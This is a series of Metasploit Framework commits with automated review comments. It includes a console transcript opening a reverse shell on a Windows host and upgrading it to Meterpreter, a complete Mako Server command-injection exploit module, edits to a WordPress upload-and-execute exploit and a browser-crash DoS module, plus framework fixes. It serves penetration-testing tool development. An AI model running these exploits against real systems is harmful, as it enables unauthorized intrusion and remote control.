Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400 + +Microsoft Windows +Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
+ +C:\Users\Smith\Downloads\MakoServer> + +``` + +## Scenarios + +### Targeting Windows 7 SP1 x64 running Mako Server v2.5 + + A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session: + + ``` + msf > use exploit/windows/http/makoserver_cmd_exec + msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 + RHOST => 10.10.10.2 + msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell + PAYLOAD => cmd/windows/reverse_powershell + msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 + LHOST => 10.10.10.4 + msf exploit(makoserver_cmd_exec) > check + [*] 10.10.10.2:80 The target appears to be vulnerable. + msf exploit(makoserver_cmd_exec) > exploit + + [*] Started reverse TCP handler on 10.10.10.4:4444 + [*] Sending payload to target... + [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400 + + Microsoft Windows + Copyright (c) Microsoft Corporation. All rights reserved. + + C:\Users\Smith\Downloads\MakoServer>^Z + Background session 1? [y/N] y + msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) + msf post(shell_to_meterpreter) > set SESSION 1 + SESSION => 1 + msf post(shell_to_meterpreter) > set LPORT 8080 + LPORT => 8080 + msf post(shell_to_meterpreter) > exploit + + [*] Upgrading session ID: 1 + [*] Starting exploit/multi/handler + [*] Started reverse TCP handler on 10.10.10.4:8080 + [-] Powershell is not installed on the target. + [*] Command stager progress: 1.66% (1699/102108 bytes) + ... 
+ [*] Command stager progress: 100.00% (102108/102108 bytes) + [*] Post module execution completed + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) + 2 meterpreter x86/windows smith-PC\smith @ SMITH-PC 10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2) + + msf post(shell_to_meterpreter) > sessions -i 2 + [*] Starting interaction with 2... + + meterpreter > getuid + Server username: smith-PC\smith + meterpreter > sysinfo + Computer : SMITH-PC + OS : Windows 7 (Build 7601, Service Pack 1). + Architecture : x64 + System Language : en_US + Domain : WORKGROUP + Logged On Users : 2 + Meterpreter : x86/windows + ``` diff --git a/modules/exploits/windows/http/makoserver_cmd_exec.rb b/modules/exploits/windows/http/makoserver_cmd_exec.rb new file mode 100644 index 0000000000..98d0e456ea --- /dev/null +++ b/modules/exploits/windows/http/makoserver_cmd_exec.rb 
@@ -0,0 +1,125 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mako Server v2.5 OS Command Injection RCE', + 'Description' => %q{ + This module exploits a vulnerability found in Mako Server v2.5. + It's possible to inject arbitrary OS commands in the Mako Server + tutorial page through a PUT request to save.lsp. + + Attacker input will be saved on the victims machine and can + be executed by sending a GET request to manage.lsp. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC + 'Steven Patterson (Shogun Lab) ' # Metasploit module + ], + 'References' => + [ + ['EDB', '42683'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3391'] + ], + 'Arch' => ARCH_CMD, + 'Platform' => 'win', + 'Targets' => + [ + ['Mako Server v2.5 - Windows x86/x64', { }] + ], + 'DefaultTarget' => 0, + 'Privileged' => false, + 'DisclosureDate' => 'Sep 3 2017')) + + register_options( + [ + OptString.new('URI', [true, 'URI path to the Mako Server app', '/']) + ] + ) + end + + def check + vprint_status('Trying to detect running Mako Server and necessary files...') + + # Send GET request to determine existence of save.lsp page + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp') + }, 20) + + # If response does not include "MakoServer.net", target is not viable. + if res.headers['Server'] !~ /MakoServer.net/ + vprint_warning 'Target is not a Mako Server.' + return CheckCode::Safe + end + + if res.body + if res.body =~ /Incorrect usage/ + # We are able to determine that the server has a save.lsp page and + # returns the correct output. 
+ vprint_status 'Mako Server save.lsp returns correct ouput.' + return CheckCode::Appears + else + # The page exists, but is not returning the expected output. + # May be a different version? + vprint_warning 'Mako Server save.lsp did not return expected output.' + return CheckCode::Detected + end + else + # The above checks failed and exploitability could not be determined. + vprint_error('Unable to determine exploitability, save.lsp not found.') + return CheckCode::Unknown + end + + return CheckCode::Safe + end + + def exploit + print_status('Sending payload to target...') + + # The double square brackets helps to ensure single/double quotes + # in cmd payload do not interfere with syntax of os.execute Lua function. + cmd = %{os.execute([[#{payload.encoded}]])} + + # If users want to troubleshoot their cmd payloads, they can see the + # Lua function with params that the module uses in a more verbose mode. + vprint_status("Now executing the following command: #{cmd}") + + # Send a PUT request to save.lsp with command payload + begin + vprint_status('Sending PUT request to save.lsp...') + send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'), + 'ctype' => 'text/plain', + 'data' => cmd, + 'http' => { + 'X-Requested-With' => 'XMLHttpRequest', + 'Referer' => 'http://localhost/Lua-Types.lsp' + } + }, 20) + rescue StandardError => e + fail_with(Failure::NoAccess, "Error: #{e}") + end + + # Send a GET request to manage.lsp with execute set to true + begin + vprint_status('Sending GET request to manage.lsp...') + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua') + }, 20) + rescue StandardError => e + fail_with(Failure::NoAccess, "Error: #{e}") + end + end +end From 85b59c87ca27c98b1d897b6f854ae86bc06a50e6 Mon Sep 17 00:00:00 2001 
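Review bot: `check` dereferences `res` without a nil guard: `send_request_cgi` returns nil when the connection fails or times out, so `res.headers['Server']` raises instead of yielding a check code; `return CheckCode::Unknown unless res` belongs before the header test. The `if res.body ... else` split cannot detect a missing page either, because the response body is normally a string (empty on a 404) rather than nil, which leaves the "save.lsp not found" branch and the trailing `return CheckCode::Safe` unreachable — testing `res.code` would make that path real. In `exploit`, the Lua long-bracket string `[[...]]` terminates at the first `]]` inside `payload.encoded`, so a payload containing that sequence breaks the injected statement; a leveled bracket such as `cmd = %{os.execute([==[#{payload.encoded}]==])}` avoids it. Both the PUT and GET responses are discarded, so a nil or non-200 reply (for example the server refusing the write) is still reported as "Sending payload" success; checking `res && res.code == 200` after each request and calling `fail_with` otherwise would surface that.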
From: Brent Cook Date: Fri, 27 Oct 2017 02:15:08 -0700 Subject: [PATCH 056/254] fix buggy handling of partial ingress packet data If we have more data, and the packet parser needs more data, connect the two together rather than bailing. This fixes reverse_tcp_ssl along with probably a lot of other higher-latency corner cases. --- lib/msf/base/sessions/meterpreter.rb | 4 ++-- lib/rex/post/meterpreter/packet_parser.rb | 20 ++++++++------------ 2 files changed, 10 insertions(+), 14 deletions(-) diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 110e1fef3d..3e13987fb1 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -147,9 +147,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') session.core.set_session_guid(guid) session.session_guid = guid - # TODO: New statgeless session, do some account in the DB so we can track it later. + # TODO: New stageless session, do some account in the DB so we can track it later. else - # TODO: This session was either staged or previously known, and so we shold do some accounting here! + # TODO: This session was either staged or previously known, and so we should do some accounting here! end unless datastore['AutoLoadStdapi'] == false diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 28bd1ef584..9aea233622 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb 
@@ -30,24 +30,20 @@ class PacketParser # Reads data from the wire and parse as much of the packet as possible. # def recv(sock) - bytes_left = self.packet.raw_bytes_required - - if bytes_left > 0 - raw = sock.read(bytes_left) - if raw + if self.packet.raw_bytes_required + while (raw = sock.read(self.packet.raw_bytes_required)) self.packet.add_raw(raw) - else - raise EOFError + break if self.packet.raw_bytes_required == 0 end end - if self.packet.raw_bytes_required == 0 - packet = self.packet - reset - return packet + if self.packet.raw_bytes_required > 0 + return nil end - nil + packet = self.packet + reset + packet end protected From d1889827606cc1f08bed6ce1367cafe41cd05e1b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 27 Oct 2017 02:29:25 -0700 Subject: [PATCH 057/254] handle masked EOF from Rex sockets (TODO: kill that behavior) --- lib/rex/post/meterpreter/packet_parser.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 9aea233622..ca646e39fd 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -27,10 +27,11 @@ class PacketParser end # - # Reads data from the wire and parse as much of the packet as possible. + # Reads data from the socket and parses as much of the packet as possible. # def recv(sock) - if self.packet.raw_bytes_required + raw = nil + if self.packet.raw_bytes_required > 0 while (raw = sock.read(self.packet.raw_bytes_required)) self.packet.add_raw(raw) break if self.packet.raw_bytes_required == 0 @@ -38,7 +39,11 @@ class PacketParser end if self.packet.raw_bytes_required > 0 - return nil + if raw == nil + raise EOFError + else + return nil + end end packet = self.packet From 037c58d1f66b2d9ed8235b392d1e6a988d3cc225 Mon Sep 17 00:00:00 2001 
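Review bot: The EOF test added in the last hunk, `if raw == nil`, only covers a nil return from `sock.read`; if a Rex socket can also signal EOF with an empty string (the commit subject says Rex sockets mask EOF, so this is worth confirming), the `while (raw = sock.read(...))` loop treats `""` as truthy, adds zero bytes, and spins without ever raising or returning. Handling both inside the loop is safer: `raw = sock.read(self.packet.raw_bytes_required)` followed by `raise EOFError if raw.nil? || raw.empty?`, which also lets the later `raw == nil` branch collapse to a plain `return nil`. Style-wise, `raw.nil?` is the idiomatic spelling of `raw == nil`, and the loop condition with an assignment inside parentheses reads more clearly as a `loop do ... end` with explicit `break`.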
From: h00die Date: Fri, 27 Oct 2017 10:10:04 -0400 Subject: [PATCH 058/254] wp-mobile-detector udpates --- .../unix/webapp/wp_mobile_detector_upload_execute.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb index ae2f4fa7ad..1817767973 100644 --- a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb @@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/' ) - if res and !res.body.include?(payload_name) + if res && !res.body.include?(payload_name) vprint_status("#{payload_name} verified as not written.") else fail_with(Failure::BadConfig,"#{payload_name} already written on system.") @@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote print_good('Sleeping 5 seconds for payload upload') register_files_for_cleanup(payload_name) - select(nil,nil,nil,5) + Rex.sleep(5) print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name)}") send_request_cgi( @@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name), }) # wait for callback, without this we exit too fast and miss our shell - select(nil,nil,nil,2) + Rex.sleep(2) handler else if res.nil? From 587c9673c67014badf578bb47dfe7fb6e228cf13 Mon Sep 17 00:00:00 2001 From: sho-luv Date: Fri, 27 Oct 2017 09:34:49 -0700 Subject: [PATCH 059/254] Added host and port to output I added the host and port number to reporting when instances are found. --- modules/auxiliary/scanner/http/jenkins_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
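Review bot: The rewritten condition `if res && !res.body.include?(payload_name)` sends a nil response (connection refused, timeout) into the `else` branch, which then fails with "already written on system" — a misleading diagnosis for a target that simply did not answer. Splitting the two cases keeps the message honest: `fail_with(Failure::Unreachable, 'No response from the plugin cache directory') unless res` ahead of the existing test, leaving the `include?` check for the genuine file-collision case. The enclosing method starts and ends outside the hunk.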
diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 953c0ca9c6..982adf452e 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary end version = res.headers['X-Jenkins'] - print_good("Jenkins Version - #{version}") + print_good("#{rhost}:#{rport} Jenkins Version - #{version}") report_service( :host => rhost, :port => rport, From 254c2a33d366dc6070845d65e9179c8b99f9895e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 27 Oct 2017 11:44:23 -0500 Subject: [PATCH 060/254] bump metasploit payloads, windows meterpreter fixes --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 69ab329926..d69ad8ecd9 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.11) + metasploit-payloads (= 1.3.13) metasploit_data_models metasploit_payloads-mettle (= 0.2.2) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.11) + metasploit-payloads (1.3.13) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 7bf217c2c3..46f5fcb14e 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.11' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.13' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' # Needed by msfgui and other rpc components From 140955f2208560b466355aacb8151618a028093c Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 27 Oct 2017 10:03:00 -0700 Subject: [PATCH 061/254] Bump version of framework to 4.16.14 --- Gemfile.lock | 18 +++++++++--------- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 10 insertions(+), 10 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index d69ad8ecd9..d1f3a823bf 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.13) + metasploit-framework (4.16.14) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -117,10 +117,10 @@ GEM dnsruby (1.60.2) docile (1.1.5) erubis (2.7.0) - factory_girl (4.8.1) + factory_girl (4.9.0) activesupport (>= 3.0.0) - factory_girl_rails (4.8.0) - factory_girl (~> 4.8.0) + factory_girl_rails (4.9.0) + factory_girl (~> 4.9.0) railties (>= 3.0.0) faraday (0.13.1) multipart-post (>= 1.2, < 3) @@ -138,7 +138,7 @@ GEM multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.6.7) + grpc (1.7.0) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) googleauth (~> 0.5.1) @@ -243,13 +243,13 @@ GEM activesupport (= 4.2.10) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (12.1.0) + rake (12.2.1) rb-readline (0.5.5) rbnacl (4.0.2) ffi rbnacl-libsodium (1.0.13) rbnacl (>= 3.0.1) - recog (2.1.15) + recog (2.1.16) nokogiri redcarpet (3.4.0) rex-arch (0.1.11) 
@@ -348,9 +348,9 @@ GEM thread_safe (0.3.6) timecop (0.9.1) ttfunk (1.5.1) - tzinfo (1.2.3) + tzinfo (1.2.4) thread_safe (~> 0.1) - tzinfo-data (1.2017.2) + tzinfo-data (1.2017.3) tzinfo (>= 1.0.0) windows_error (0.1.2) xdr (2.0.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index c111856d17..9690195ec5 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.13" + VERSION = "4.16.14" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 73c9807c55188f29ef7757f62bb3ca355e0d7ed3 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 25 Oct 2017 14:45:47 -0500 Subject: [PATCH 062/254] Add module support for sessions -s --- lib/msf/ui/console/command_dispatcher/core.rb | 30 ++++++++----------- 1 file changed, 12 insertions(+), 18 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 675538ae61..6c4e796224 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -47,7 +47,7 @@ class Core "-q" => [ false, "Quiet mode" ], "-k" => [ true, "Terminate sessions by session ID and/or range" ], "-K" => [ false, "Terminate all sessions" ], - "-s" => [ true, "Run a script on the session given with -i, or all" ], + "-s" => [ true, "Run a script or module on the session given with -i, or all" ], "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], "-t" => [ true, "Set a response timeout (default: 15)" ], 
@@ -1180,10 +1180,10 @@ class Core sid = val || false when "-K" method = 'killall' - # Run a script on all meterpreter sessions + # Run a script or module on specified sessions when "-s" unless script - method = 'scriptall' + method = 'script' script = val end # Upload and exec to the specific command session @@ -1389,15 +1389,11 @@ class Core sid = nil end end - when 'scriptall' + when 'script' unless script - print_error("No script specified!") + print_error("No script or module specified!") return false end - script_paths = {} - script_paths['meterpreter'] = Msf::Sessions::Meterpreter.find_script_path(script) - script_paths['shell'] = Msf::Sessions::CommandShell.find_script_path(script) - sessions = sid ? session_list : framework.sessions.keys.sort sessions.each do |sess_id| @@ -1413,15 +1409,13 @@ class Core session.response_timeout = response_timeout end begin - if script_paths[session.type] - print_status("Session #{sess_id} (#{session.session_host}):") - print_status("Running script #{script} on #{session.type} session" + - " #{sess_id} (#{session.session_host})") - begin - session.execute_file(script_paths[session.type], extra) - rescue ::Exception => e - log_error("Error executing script: #{e.class} #{e}") - end + print_status("Session #{sess_id} (#{session.session_host}):") + print_status("Running #{script} on #{session.type} session" + + " #{sess_id} (#{session.session_host})") + begin + session.execute_script(script, *extra) + rescue ::Exception => e + log_error("Error executing script or module: #{e.class} #{e}") end ensure if session.respond_to?(:response_timeout) && last_known_timeout From 9349e1eda532adfa6338c4de225329d17647dbaf Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 27 Oct 2017 11:11:29 -0500 Subject: [PATCH 063/254] Fix find_script_path to check only files --- lib/msf/base/sessions/scriptable.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
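Review bot: The rewritten per-session loop keeps `rescue ::Exception => e` around `session.execute_script(script, *extra)`, which also catches `Interrupt`, so Ctrl-C while iterating over every session is logged as "Error executing script or module" and the loop proceeds to the next session instead of stopping; narrowing it to `rescue ::StandardError => e`, or placing `rescue ::Interrupt; raise` ahead of it, preserves the ability to abort. The removed `if script_paths[session.type]` guard used to skip sessions with no matching script, whereas the new code calls `execute_script` on every session type and relies on that method to reject an unknown name — fine only if it reports the failure rather than returning quietly, which is worth confirming in Scriptable. The enclosing method starts outside the hunk.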
diff --git a/lib/msf/base/sessions/scriptable.rb b/lib/msf/base/sessions/scriptable.rb index d136f9a396..87a44c031f 100644 --- a/lib/msf/base/sessions/scriptable.rb +++ b/lib/msf/base/sessions/scriptable.rb @@ -27,7 +27,7 @@ module Scriptable # Scan all of the path combinations check_paths.each { |path| - if ::File.exist?(path) + if ::File.file?(path) full_path = path break end @@ -150,7 +150,7 @@ module Scriptable # session local_exploit_opts = local_exploit_opts.merge(opts) - new_session = mod.exploit_simple( + mod.exploit_simple( 'Payload' => local_exploit_opts.delete('payload'), 'Target' => local_exploit_opts.delete('target'), 'LocalInput' => self.user_input, From b96fa690a9d206d6a12ab722a1f37537169885b9 Mon Sep 17 00:00:00 2001 From: Steven Patterson Date: Fri, 27 Oct 2017 15:23:22 -0400 Subject: [PATCH 064/254] Add brackets to print functions --- modules/exploits/windows/http/makoserver_cmd_exec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/http/makoserver_cmd_exec.rb b/modules/exploits/windows/http/makoserver_cmd_exec.rb index 98d0e456ea..5326d5bb7a 100644 --- a/modules/exploits/windows/http/makoserver_cmd_exec.rb +++ b/modules/exploits/windows/http/makoserver_cmd_exec.rb @@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote # If response does not include "MakoServer.net", target is not viable. if res.headers['Server'] !~ /MakoServer.net/ - vprint_warning 'Target is not a Mako Server.' + vprint_warning('Target is not a Mako Server.') return CheckCode::Safe end 
@@ -66,12 +66,12 @@ class MetasploitModule < Msf::Exploit::Remote if res.body =~ /Incorrect usage/ # We are able to determine that the server has a save.lsp page and # returns the correct output. - vprint_status 'Mako Server save.lsp returns correct ouput.' + vprint_status('Mako Server save.lsp returns correct ouput.') return CheckCode::Appears else # The page exists, but is not returning the expected output. # May be a different version? - vprint_warning 'Mako Server save.lsp did not return expected output.' + vprint_warning('Mako Server save.lsp did not return expected output.') return CheckCode::Detected end else From 9c16da9c985b2dbc627523466fb470d73bd9d72d Mon Sep 17 00:00:00 2001 From: RootUp Date: Sat, 28 Oct 2017 18:53:15 +0530 Subject: [PATCH 065/254] Update ibm_lotus_notes2.rb --- .../auxiliary/dos/http/ibm_lotus_notes2.rb | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb index 4513c9dfda..67df421cfd 100644 --- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super( update_info( info, - 'Name' => "IBM Notes encodeURI DOS", + 'Name' => "IBM Notes Denial Of Service", 'Description' => %q( This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. If successful, the browser will crash after viewing the webpage. @@ -46,17 +46,17 @@ var i = 1; f.click(); setInterval("f.click()", 1); setInterval(function(){ - for (var k in kins) { - if (kins[k] && kins[k].status === undefined) { - kins[k].close(); - delete kins[k]; - } - } - w = open('data:text/html, From 3b8ef02c29da293e37cec0a9c58f577ff704026d Mon Sep 17 00:00:00 2001 
From: h00die Date: Sun, 29 Oct 2017 08:36:05 -0400 Subject: [PATCH 066/254] sid vs side --- lib/msf/core/post/windows/priv.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb index 869e129261..084f9acec7 100644 --- a/lib/msf/core/post/windows/priv.rb +++ b/lib/msf/core/post/windows/priv.rb @@ -194,7 +194,7 @@ module Msf::Post::Windows::Priv # def is_high_integrity? il = get_integrity_level - (il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SIDE[:system]) + (il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SID[:system]) end # From 940573ad49f2bc98fb2f2b6e895148ef684e58ec Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sun, 29 Oct 2017 15:57:33 -0400 Subject: [PATCH 067/254] Support ruby directives in Meterpreter rc scripts --- .../ui/console/command_dispatcher/resource.rb | 6 +- .../ui/console/command_dispatcher/core.rb | 78 ++++++++++++------- lib/rex/ui/text/dispatcher_shell.rb | 68 ++++++++++++++++ 3 files changed, 122 insertions(+), 30 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/resource.rb b/lib/msf/ui/console/command_dispatcher/resource.rb index b020bd743f..8f2e6277fd 100644 --- a/lib/msf/ui/console/command_dispatcher/resource.rb +++ b/lib/msf/ui/console/command_dispatcher/resource.rb @@ -59,8 +59,8 @@ module Msf elsif # let's check to see if it's in the scripts/resource dir (like when tab completed) [ - ::Msf::Config.script_directory + ::File::SEPARATOR + "resource", - ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource" + ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource', + ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' ].each do |dir| res_path = dir + ::File::SEPARATOR + res if ::File.exist?(res_path) 
@@ -97,7 +97,7 @@ module Msf [ ::Msf::Config.script_directory + File::SEPARATOR + "resource", ::Msf::Config.user_script_directory + File::SEPARATOR + "resource", - "." + '.' ].each do |dir| next if not ::File.exist? dir tabs += ::Dir.new(dir).find_all { |e| diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index a9cafc2d71..5d854c6fd1 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb 
@@ -1530,49 +1530,73 @@ class Console::CommandDispatcher::Core end def cmd_resource_help - print_line('Usage: resource [path2 ...]') + print_line "Usage: resource path1 [path2 ...]" print_line - print_line('Run the commands stored in the supplied files.') + print_line "Run the commands stored in the supplied files (- for stdin)." + print_line "Resource files may also contain ERB or Ruby code between tags." print_line end def cmd_resource(*args) if args.empty? + cmd_resource_help return false end - args.each do |glob| - files = ::Dir.glob(::File.expand_path(glob)) - if files.empty? - print_error("No such file #{glob}") - next - end - files.each do |filename| - print_status("Reading #(unknown)") - if (not ::File.readable?(filename)) - print_error("Could not read file #(unknown)") - next - else - ::File.open(filename, 'r').each_line do |line| - next if line.strip.length < 1 - next if line[0,1] == '#' - begin - print_status("Running #{line}") - client.console.run_single(line) - rescue ::Exception => e - print_error("Error Running Command #{line}: #{e.class} #{e}") - end - + args.each do |res| + good_res = nil + if res == '-' + good_res = res + elsif ::File.exist?(res) + good_res = res + elsif + # let's check to see if it's in the scripts/resource dir (like when tab completed) + [ + ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter', + ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter' + ].each do |dir| + res_path = dir + ::File::SEPARATOR + res + if ::File.exist?(res_path) + good_res = res_path + break end end end + if good_res + client.console.load_resource(good_res) + else + print_error("#{res} is not a valid resource file") + next + end end end def cmd_resource_tabs(str, words) - return [] if words.length > 1 - - tab_complete_filenames(str, words) + tabs = [] + #return tabs if words.length > 1 + if ( str and str =~ /^#{Regexp.escape(::File::SEPARATOR)}/ ) + # 
then you are probably specifying a full path so let's just use normal file completion + return tab_complete_filenames(str,words) + elsif (not words[1] or not words[1].match(/^\//)) + # then let's start tab completion in the scripts/resource directories + begin + [ + ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter', + ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter', + '.' + ].each do |dir| + next if not ::File.exist? dir + tabs += ::Dir.new(dir).find_all { |e| + path = dir + ::File::SEPARATOR + e + ::File.file?(path) and ::File.readable?(path) + } + end + rescue Exception + end + else + tabs += tab_complete_filenames(str,words) + end + return tabs end def cmd_enable_unicode_encoding diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb index 878010829c..a5f365671f 100644 --- a/lib/rex/ui/text/dispatcher_shell.rb +++ b/lib/rex/ui/text/dispatcher_shell.rb @@ -2,6 +2,7 @@ require 'rex/ui' require 'pp' require 'rex/text/table' +require 'erb' module Rex module Ui 
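Review bot: In `cmd_resource` the `elsif` has no condition of its own: the array literal with its `.each` block becomes the condition, the lookup runs as a side effect of evaluating it, and the `elsif` body is empty — it works only because a non-empty array is truthy, and it reads like a bug. `else` followed by the same lookup loop is the intended shape (resource.rb in the same commit uses the identical construct, so both deserve the fix). The help text promises "ERB or Ruby code between tags" without naming the tag; given that the parser in dispatcher_shell.rb terminates a block on `</ruby>`, spell it out as `<ruby>...</ruby>` so users know the syntax. The commented-out `#return tabs if words.length > 1` in `cmd_resource_tabs` is dead code and should be removed rather than left behind.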
